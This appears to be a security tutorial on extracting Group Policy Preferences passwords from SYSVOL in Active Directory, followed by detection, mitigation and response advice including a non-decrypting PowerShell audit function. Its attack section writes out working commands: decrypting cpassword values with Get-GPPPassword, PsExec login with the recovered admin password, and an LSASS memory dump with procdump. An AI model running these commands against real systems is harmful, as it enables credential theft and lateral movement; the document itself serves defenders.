
Plaintext Password Extraction Attack

Group Policy is essential in managing an Active Directory environment. In particular, administrators use it to centrally manage configurations applied to domain-joined servers and workstations; these Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify. Unfortunately, Group Policy enabled administrators to embed passwords in Group Policy preferences that created local users or mapped network drives — and those passwords were encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords. In 2014, Microsoft released a security update that removes the ability to create new preferences with embedded passwords, but many organizations still have Group Policy preferences that include embedded passwords.

Threat Summary

Target: Active Directory

Tools: PowerSploit, Metasploit

ATT&CK® Tactic: Credential Access

ATT&CK Technique: T1552.006

Difficulty

Detection: Low

Mitigation: Low

Response: Low

Attack Tutorial: How a Plaintext Password Extraction Attack Works

STEP 1: Discover passwords in Group Policy preferences

Group Policy preferences are stored as XML files in the SYSVOL share on domain controllers. The SYSVOL share is readable by Authenticated Users, so any adversary who has gained a foothold within the network can access its contents. An adversary can parse these XML files manually, looking for instances of the attribute cpassword, which contains the encrypted password; adjacent attributes provide other details, such as the username. Alternatively, they can use tools like PowerSploit’s Get-GPPPassword cmdlet to automate the process of acquiring and decrypting these passwords, as shown below.

    PS> Import-Module PowerSploit
    PS> Get-GPPPassword

    Changed   : {2020-08-17 11:14:01}
    UserNames : {Administrator (built-in)}
    NewName   : [BLANK]
    Passwords : {WhatAGreatPassword123!}
    File      : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml

    PS>

STEP 2: Use the recovered credential to move laterally

Now that the adversary has the username and password for a local administrator, they can enumerate the computers in Active Directory to which the Group Policy is linked, which gives them a list of computers where this credential is valid. With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the LSASS.exe process to enable further lateral movement or privilege escalation.

    PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
    PS> $XML.GPO.LinksTo

    SOMName SOMPath         Enabled NoOverride
    ------- -------         ------- ----------
    Comp    domain.com/Comp true    false

    PS> $DN = Get-ADOrganizationalUnit -Filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select-Object -ExpandProperty DistinguishedName
    PS> Get-ADComputer -Filter "*" -SearchBase $DN

    DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
    DNSHostName       :
    Enabled           : True
    Name              : Server1
    ObjectClass       : computer
    ObjectGUID        : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
    SamAccountName    : SERVER1$
    SID               : S-1-5-21-5840559-2756745051-1363507867-16924
    UserPrincipalName :

    PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe

    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com

    PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
    PS>

Detect, Mitigate and Respond

Detect

Difficulty: Low

Because SYSVOL is read constantly during normal operations, it is not practical to directly detect an adversary’s access to these files. However, you can audit for passwords embedded in Group Policy preferences using the same techniques an adversary would use. Running the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:

    # Replace this path with the path to the SYSVOL share to check
    $SYSVOL_Path = "\\domain.com\sysvol"
    Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"

    # Sample output using \\domain.com\sysvol
    \\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
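A more structured audit than the Select-String one-liner, added here as an example and not code from the original page: it parses each preference file with the .NET XML parser, reports which GPO, preference type and account each cpassword belongs to, and never decrypts the value. The SYSVOL path is a placeholder, and the list of preference file names is an assumption based on the preference types that could carry embedded passwords before the 2014 update.

```powershell
function Find-GppEmbeddedPassword {
    [CmdletBinding()]
    param(
        # Policies folder inside SYSVOL; replace with the domain you are auditing.
        [string]$PoliciesPath = "\\domain.com\SYSVOL\domain.com\Policies"
    )

    # Preference types in which passwords could be embedded before MS14-025 (assumed list).
    $candidateFiles = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml',
                      'DataSources.xml', 'Drives.xml', 'Printers.xml'

    Get-ChildItem -Path $PoliciesPath -Recurse -File -Include $candidateFiles -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        try { [xml]$doc = Get-Content -Path $file.FullName -Raw -ErrorAction Stop }
        catch { Write-Warning "Could not parse $($file.FullName)"; return }

        # Every element carrying a non-empty cpassword attribute is a finding.
        foreach ($props in $doc.SelectNodes('//*[@cpassword and string-length(@cpassword) > 0]')) {
            $item = $props.ParentNode   # <User>, <NTService>, <Task>, <Drive>, ...

            # The GPO GUID is the {GUID} folder directly under Policies.
            $gpoGuid = if ($file.FullName -match '\\(\{[0-9A-Fa-f-]+\})\\') { $Matches[1] } else { $null }

            # Different preference types name the account attribute differently.
            $account = foreach ($attr in 'userName', 'accountName', 'runAs', 'username') {
                if ($props.GetAttribute($attr)) { $props.GetAttribute($attr); break }
            }

            [pscustomobject]@{
                GpoGuid        = $gpoGuid
                PreferenceType = $file.Name
                Item           = $item.GetAttribute('name')
                Account        = $account
                Changed        = $item.GetAttribute('changed')
                File           = $file.FullName
            }
        }
    }
}

# Usage: list every preference that still embeds a password, newest first.
# Decryption is deliberately omitted; the presence of cpassword is the finding.
Find-GppEmbeddedPassword | Sort-Object Changed -Descending | Format-Table -AutoSize
```

Each reported GpoGuid can be resolved to a display name with Get-GPO -Guid for the Respond steps below.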

Mitigate

Difficulty: Low

Simply put, all embedded passwords in Group Policy preferences should be removed. Additionally:

  • Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
  • Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.

Respond

Difficulty: Low

Should you discover embedded passwords in Group Policy preferences, the following actions can be taken:

  • Remove the embedded password from the Group Policy preference.
  • Reset the password for the account.
